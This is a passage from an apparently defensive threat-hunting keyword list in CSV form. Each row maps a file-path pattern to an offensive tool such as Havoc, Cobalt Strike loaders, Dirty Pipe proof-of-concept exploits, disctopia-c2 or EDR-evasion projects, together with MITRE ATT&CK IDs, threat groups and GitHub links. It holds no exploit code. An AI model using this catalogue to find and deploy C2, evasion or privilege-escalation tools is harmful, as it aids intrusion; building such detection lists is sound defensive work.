TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/demosyscalls.exe*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/Dendrobate.git*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/Dendron.bin*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/Dendron.csproj*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/Dendron.exe*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/Dendron.sln*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/Dent/*/Loader/Loader.go*,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,1,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z -*/Dent/Dent.go*,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,1,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z -*/Dent/Loader*,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,1,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z -*/DesertFox/archive/*.zip*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,1,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*/detail/kali-linux/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/detect_antivirus/*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/detect_antivirus/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/detect-hooks.c*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -*/detect-hooks.cna*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -*/detect-hooks.h*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -*/Detect-Hooks/*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -*/DFSCoerce.git*,offensive_tool_keyword,DFSCoerce,PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?,T1550.001 - T1078.003 - T1046,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Wh04m1001/DFSCoerce,1,1,N/A,10,7,635,78,2022-09-09T17:45:41Z,2022-06-18T12:38:37Z -*/dhcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Dialogs/Payload.hpp*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/dicom-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dicom-ping.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dict-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dicts/ftp_default.txt*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/DInjector.git*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*/DInvoke/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/DInvokeResolver/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/dir_brute.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/dirbuster*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/dirbuster/*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/DirCreate2System.git*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*/direct_syscall_amd64.s*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*/dirsearch.py*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -*/Dirty-Pipe.sh*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/imfiver/CVE-2022-0847,1,1,N/A,N/A,3,257,74,2023-02-02T02:17:30Z,2022-03-07T18:36:50Z -*/Dirty-Pipe.sh*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/puckiestyle/CVE-2022-0847,1,1,N/A,N/A,1,1,1,2022-03-10T08:10:40Z,2022-03-08T14:46:21Z -*/Dirty-Pipe/main/exploit-static*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/carlosevieira/Dirty-Pipe,1,1,N/A,N/A,1,8,5,2022-03-07T21:01:15Z,2022-03-07T20:57:34Z -*/dirtypipez.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/dirtypipez.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/febinrev/dirtypipez-exploit,1,1,N/A,N/A,1,41,21,2022-03-08T11:52:22Z,2022-03-08T11:49:40Z -*/dirtypipez.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/puckiestyle/CVE-2022-0847,1,1,N/A,N/A,1,1,1,2022-03-10T08:10:40Z,2022-03-08T14:46:21Z -*/dirtypipez-exploit/*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/febinrev/dirtypipez-exploit,1,1,N/A,N/A,1,41,21,2022-03-08T11:52:22Z,2022-03-08T11:49:40Z -*/disctopia.py*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,1,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*/disctopia-c2*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,1,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*/DiskCryptor.git*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*/dist/fw_walk.*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,1,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z -*/distcc-cve2004-2687.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/distopia-test*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,0,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*/dll/inject/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/dllexploit.cpp*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*/dllexploit.exe*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*/DllExport.bat*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic 